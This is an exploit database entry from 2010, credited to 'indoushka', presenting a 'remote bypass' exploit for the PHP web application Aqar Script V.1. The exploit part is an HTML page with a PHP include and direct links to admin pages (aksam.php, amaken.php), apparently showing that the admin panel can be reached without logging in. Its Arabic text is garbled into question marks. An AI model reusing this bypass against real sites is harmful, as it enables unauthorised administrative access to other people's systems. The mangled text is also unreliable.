Aqar Script V.1 Remote By pass Exploit

2010-05-11T00:00:00
ID 1337DAY-ID-12199
Type zdt
Reporter indoushka
Modified 2010-05-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================
Aqar Script V.1 Remote By pass Exploit
======================================

========================================================================================
| # Title : Aqar Script V.1 Remote By pass Exploit
| # Author : indoushka
| # email : [email protected]
| # Home : www.iqs3cur1ty.com/vb
| # Script : Powered By AqarScript
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)
| # Bug : Backup Dump
====================== Exploit By indoushka =================================
# Exploit :
 
<html dir=rtl>
 
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>
 
<body>
<table border="0" cellspacing="5" cellpadding="0">
<tr>
<td width="100%" colspan="3" valign="top" align="right">
<h1>???? ?????? - ???? ??????</h1>
</td>
<td width="100%" valign="top" align="right">
</td>
</tr>
<tr>
<td valign="top" align="right" nowrap>
<?php
include("./qa2ema.php");
?>
</td>
<meta http-equiv="Content-Language" content="ar-eg">
<td valign="top" align="right"><font face="Tahoma">????? ?? ?? ????
?????? ?????? ????? ??????<br>
?? ??? ???? ????? ????? ????? ?????? ?? ???? ??????? <br>
????? ?????? ?? ?????? 2<br>
<br>
<b><font size="1">?? ????? ???? ??</font></b></font>
</tr>
</table>
</body>
<ul>
<li><a href="http://127.0.0.1/Aqar/admin/aksam.php">???????</a></li>
<li><a href="http://127.0.0.1/Aqar/admin/amaken.php">??????? ????????</a></li>
</ul>
</html>



#  0day.today [2018-03-02]  #